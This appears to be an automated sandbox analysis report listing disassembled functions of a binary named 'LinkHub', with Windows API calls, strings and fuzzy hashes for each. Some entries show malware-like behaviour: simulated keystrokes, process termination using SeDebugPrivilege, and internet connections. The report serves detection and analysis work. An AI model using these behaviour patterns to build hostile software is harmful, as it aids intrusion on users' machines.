Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: b970c8a94baff6492bece9ac78c8686b1fd57fa6406110ed9f970ee5c9a56e8f
Instruction ID: fc57d933861f33c83a508d2c015818de095fa8ab1897ab0a5e01b558e45276f6
Opcode Fuzzy Hash: b970c8a94baff6492bece9ac78c8686b1fd57fa6406110ed9f970ee5c9a56e8f
Instruction Fuzzy Hash: 7E11067E284707BAFA246621EC06EEA77DDDF17724B204022F909E41D1FB6169A17514

Function 00BB7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00BB758D
GetWindowRect.USER32(?,?), ref: 00BB75CE
ScreenToClient.USER32(?,?), ref: 00BB75F6
GetClientRect.USER32(?,?), ref: 00BB773A
GetWindowRect.USER32(?,?), ref: 00BB775B

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: ac77923db49513ca2c4b828b537ccaf93d4977a92010f264b3ed7c5237bd0266
Instruction ID: 75cb79da0193b78c29aaefd41343af5c8cde070dfa709fb921f91ff8bed01c43
Opcode Fuzzy Hash: ac77923db49513ca2c4b828b537ccaf93d4977a92010f264b3ed7c5237bd0266
Instruction Fuzzy Hash: 56C17B3990464AEFDB10CFA8C580BFDB7F1FF58310F14845AE896A7250DB74A941DB60

Function 00BED210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00BED237
_free.LIBCMT ref: 00BED2A2
_free.LIBCMT ref: 00BED2C8
_free.LIBCMT ref: 00BED2F1
_free.LIBCMT ref: 00BED329
_free.LIBCMT ref: 00BED35A
_free.LIBCMT ref: 00BED39B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00BED41C
_free.LIBCMT ref: 00BED435

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: fbc5e809577b5f174ca2cfe3e9c3de66fbbd94ed4f623a9391bd7673b1ebcb59
Instruction ID: 187ab0077471e75c15984b2db16f9df5a29d2165d0e57ef4b51bacd48c83ee8e
Opcode Fuzzy Hash: fbc5e809577b5f174ca2cfe3e9c3de66fbbd94ed4f623a9391bd7673b1ebcb59
Instruction Fuzzy Hash: 7E612971904395AFDB22AF76DC817AE7BE8EF01320F0445EEEE45A7282D7B1D8018795

Function 00C45B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00C45C24
ShowWindow.USER32(?,00000000), ref: 00C45C65
ShowWindow.USER32(?,00000005,?,00000000), ref: 00C45C6B
SetFocus.USER32(?,?,00000005,?,00000000), ref: 00C45C6F

Part of subcall function 00C479F2: DeleteObject.GDI32(00000000), ref: 00C47A1E

GetWindowLongW.USER32(?,000000F0), ref: 00C45CAB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C45CB8
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C45CEB
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00C45D25
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00C45D34

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 74d67bf5c10a36c2d6893ee29b2425436a5809e0b8c68a785a318f33c922a375
Instruction ID: 78025844871618ec4658ac2428db561833e8b1c29d5036c49c7c45e7556fc189
Opcode Fuzzy Hash: 74d67bf5c10a36c2d6893ee29b2425436a5809e0b8c68a785a318f33c922a375
Instruction Fuzzy Hash: 6B51B335A40A08BFEF249F29CC89FD93BA5FF09750F144111F525DA1E2C776AA80DB41

Function 00BB13A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00BF28D1
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00BF28EA
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00BF28FA
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00BF2912
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00BF2933
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00BF2942
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00BF295F
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00BB11F5,00000000,00000000,00000000,000000FF,00000000), ref: 00BF296E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: cca8b2f76680a73c944ac1440b037a0f4bb99efd3689241254102ec7b307ba83
Instruction ID: 1a069cc4a4f7ac967a6d81dc7a774b3afdb7ab662c68b449728a98ab1b2cd0c4
Opcode Fuzzy Hash: cca8b2f76680a73c944ac1440b037a0f4bb99efd3689241254102ec7b307ba83
Instruction Fuzzy Hash: 5B516974600209AFDB24DF29CC95BBA7BF5FF48750F108968FA42972A0D7B0E990DB50

Function 00C2CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C2CBC7
GetLastError.KERNEL32 ref: 00C2CBDA
SetEvent.KERNEL32(?), ref: 00C2CBEE

Part of subcall function 00C2CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C2CCB7
Part of subcall function 00C2CC98: GetLastError.KERNEL32 ref: 00C2CD67
Part of subcall function 00C2CC98: SetEvent.KERNEL32(?), ref: 00C2CD7B
Part of subcall function 00C2CC98: InternetCloseHandle.WININET(00000000), ref: 00C2CD86

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 0a1f832337dd4061c4434c401fb07f55060fad223ae705a3b5348d4084ecc08d
Instruction ID: e7f3f3872971a825160e7e4473f8e3c5a18bd4242f69285d86f3698408a3d6d2
Opcode Fuzzy Hash: 0a1f832337dd4061c4434c401fb07f55060fad223ae705a3b5348d4084ecc08d
Instruction Fuzzy Hash: 04318975200715AFDB21AF61ED84B6EBBB8FF05300B10452DF96A83A10C731E914ABA0

Function 00C12EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C14393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C143AD
Part of subcall function 00C14393: GetCurrentThreadId.KERNEL32 ref: 00C143B4
Part of subcall function 00C14393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C12F00), ref: 00C143BB

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C12F0A
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C12F28
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00C12F2C
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C12F36
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C12F4E
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00C12F52
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C12F5C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C12F70
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00C12F74

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: ac2d667d6c504e76f0520655a442a953abc7f02da2139fa2b556ca6506f3d0f2
Instruction ID: 86ae5ce0c3c8173be226b418287ed16d23f72d233aae9ebdf1f3a7b296818ee7
Opcode Fuzzy Hash: ac2d667d6c504e76f0520655a442a953abc7f02da2139fa2b556ca6506f3d0f2
Instruction Fuzzy Hash: C901D434784220BBFB107769DC8AF9D3F5AEB4FB21F110011F719AE1E0C9E264459AA9

Function 00C12150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00C11D95,?,?,00000000), ref: 00C12159
HeapAlloc.KERNEL32(00000000,?,00C11D95,?,?,00000000), ref: 00C12160
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C11D95,?,?,00000000), ref: 00C12175
GetCurrentProcess.KERNEL32(?,00000000,?,00C11D95,?,?,00000000), ref: 00C1217D
DuplicateHandle.KERNEL32(00000000,?,00C11D95,?,?,00000000), ref: 00C12180
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C11D95,?,?,00000000), ref: 00C12190
GetCurrentProcess.KERNEL32(00C11D95,00000000,?,00C11D95,?,?,00000000), ref: 00C12198
DuplicateHandle.KERNEL32(00000000,?,00C11D95,?,?,00000000), ref: 00C1219B
CreateThread.KERNEL32(00000000,00000000,00C121C1,00000000,00000000,00000000), ref: 00C121B5

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 8c40183b5bea4e4d0a60e771f5cb1b3ec0d574053284f09e3f6208c96cd99817
Instruction ID: 12756b5f3bc32e10a7919a60568870b2742855e9e04b61b576616c4db0b9d96d
Opcode Fuzzy Hash: 8c40183b5bea4e4d0a60e771f5cb1b3ec0d574053284f09e3f6208c96cd99817
Instruction Fuzzy Hash: 4301A8B9640304BFE610AFA5DC49F6F7BACFB89711F004411FA05DB1A1CA709810CA20

Function 00C3AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00C1DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00C1DDAC
Part of subcall function 00C1DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00C1DDBA
Part of subcall function 00C1DD87: CloseHandle.KERNELBASE(00000000), ref: 00C1DE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3ABCA
GetLastError.KERNEL32 ref: 00C3ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C3ACC5
GetLastError.KERNEL32(00000000), ref: 00C3ACD0
CloseHandle.KERNEL32(00000000), ref: 00C3AD21

Strings

SeDebugPrivilege, xrefs: 00C3ABEC

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 7bf8f6d529ca7fa0bf42f3df001ef1222cb732d1a8a31e51d4a541f58be5c229
Instruction ID: a95cb18ea1012a3fa91eedd8eaea29255c1f54d2c91fdc4ede2cd57ff4cc3cb0
Opcode Fuzzy Hash: 7bf8f6d529ca7fa0bf42f3df001ef1222cb732d1a8a31e51d4a541f58be5c229
Instruction Fuzzy Hash: 3061C074214242AFD320DF15C494F69BBE0BF44318F18849CE8A64BBA3C7B2ED45CB92

Function 00C44322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C443C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00C443D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C443F0
_wcslen.LIBCMT ref: 00C44435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C44462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C44490

Strings

SysListView32, xrefs: 00C44393

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 144a9e3d8c2cecc91e0d5c5bccd56505a5821eae44d9c9d7f76f58eba26f335d
Instruction ID: bd77e3763ce204862afcc2ab5a4632b427a8566301a94c2a40582027e3fda692
Opcode Fuzzy Hash: 144a9e3d8c2cecc91e0d5c5bccd56505a5821eae44d9c9d7f76f58eba26f335d
Instruction Fuzzy Hash: 9A41E071A00318ABDF259F64CC49BEE7BA9FF08760F200126F918E7291D7749D84CB90

Function 00C1C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C1C6C4
IsMenu.USER32(00000000), ref: 00C1C6E4
CreatePopupMenu.USER32 ref: 00C1C71A
GetMenuItemCount.USER32(00DC6750), ref: 00C1C76B
InsertMenuItemW.USER32(00DC6750,?,00000001,00000030), ref: 00C1C793

Strings

0, xrefs: 00C1C66F
2, xrefs: 00C1C6FE

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 8b4449f5a727b5d14d273c88dff7d5550a730e893c9b17b392857c11bd9e2005
Instruction ID: c2e198daeeb29da2329402795fea416b4e31f1b5d963c2b03ef7e6708c2dfb65
Opcode Fuzzy Hash: 8b4449f5a727b5d14d273c88dff7d5550a730e893c9b17b392857c11bd9e2005
Instruction Fuzzy Hash: FD5190706402059BDF10DFA8D8C4BEEBBF4AF56314F24415AF922972D1D7B09A81EF91

Function 00C1D11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C1D1BE

Strings

question, xrefs: 00C1D177
stop, xrefs: 00C1D18F
blank, xrefs: 00C1D140
warning, xrefs: 00C1D1A7
info, xrefs: 00C1D15F

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 9f0518afdd91cff540c402e6ba248d2e398800aec19300c3beee413ac05cacf6
Instruction ID: 346449c5f1aba20b1bc24d0e08cba2c98d373bbed2bda48a7295f524885a423b
Opcode Fuzzy Hash: 9f0518afdd91cff540c402e6ba248d2e398800aec19300c3beee413ac05cacf6
Instruction Fuzzy Hash: D711B43624830ABBE7065F55EC82DEE77EC9F07770B30007AF906A6281E7B4AF805161

Function 00C1E73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C1E759
gethostname.WSOCK32(?,00000100), ref: 00C1E773
gethostbyname.WSOCK32(?), ref: 00C1E780
inet_ntoa.WSOCK32(?), ref: 00C1E7C2
_strcat.LIBCMT ref: 00C1E7D0
WSACleanup.WSOCK32 ref: 00C1E7F5

Strings

0.0.0.0, xrefs: 00C1E79E

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: dd5ab8e764d7cb795ad2ddd5baa03d2fcedbe8b4ba86f3ce08082abfe1170aec
Instruction ID: edf87640ee0154e210c2f82c7f42271d3b2eea849838b60f24a32b08c6515ee6
Opcode Fuzzy Hash: dd5ab8e764d7cb795ad2ddd5baa03d2fcedbe8b4ba86f3ce08082abfe1170aec
Instruction Fuzzy Hash: 4C11C0359001157BDB20BB649C4AFEE77ACEB02710F0400AAF926E6191EF748A81E690

Function 00C1F630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C1F641
_wcslen.LIBCMT ref: 00C1F652
_wcslen.LIBCMT ref: 00C1F690
_wcslen.LIBCMT ref: 00C1F6C6
_wcslen.LIBCMT ref: 00C1F6F6
_wcslen.LIBCMT ref: 00C1F706
_wcslen.LIBCMT ref: 00C1F742
_wcslen.LIBCMT ref: 00C1F771

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: a592f7af448533d0b2d8061170b77e3490cf7ba553a98e602806656d67cfc401
Instruction ID: 4f111b4cea77e4c1ba08b3b21ef040ed905f40155262e3f83abc8900a12829d1
Opcode Fuzzy Hash: a592f7af448533d0b2d8061170b77e3490cf7ba553a98e602806656d67cfc401
Instruction Fuzzy Hash: 11419565C1111476CB11EBB8CC86ACFF7A8AF06310F5444A7E518E3261FB34E256C3E6

Function 00BCFBC6 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00BF39E2,00000004,00000000,00000000), ref: 00BCFC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00BF39E2,00000004,00000000,00000000), ref: 00C0FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00BF39E2,00000004,00000000,00000000), ref: 00C0FC98

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: cd790182b3cf4e40f637aa0cf5da98d8f7d192a635dd5f1179a49c603db37d1c
Instruction ID: 123e267f5a7eb17f910242d3577ffe4c8c0f17bb27e1b2d14f77bec4883ffd1d
Opcode Fuzzy Hash: cd790182b3cf4e40f637aa0cf5da98d8f7d192a635dd5f1179a49c603db37d1c
Instruction Fuzzy Hash: 6041D13070838A9ADB399B3989D8F7B7BD3FB46310F1445EDE94746AA0C631A881DB11

Function 00C4379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C437B7
GetDC.USER32(00000000), ref: 00C437BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C437CA
ReleaseDC.USER32(00000000,00000000), ref: 00C437D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C43812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C43823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C46504,?,?,000000FF,00000000,?,000000FF,?), ref: 00C4385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C4387D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
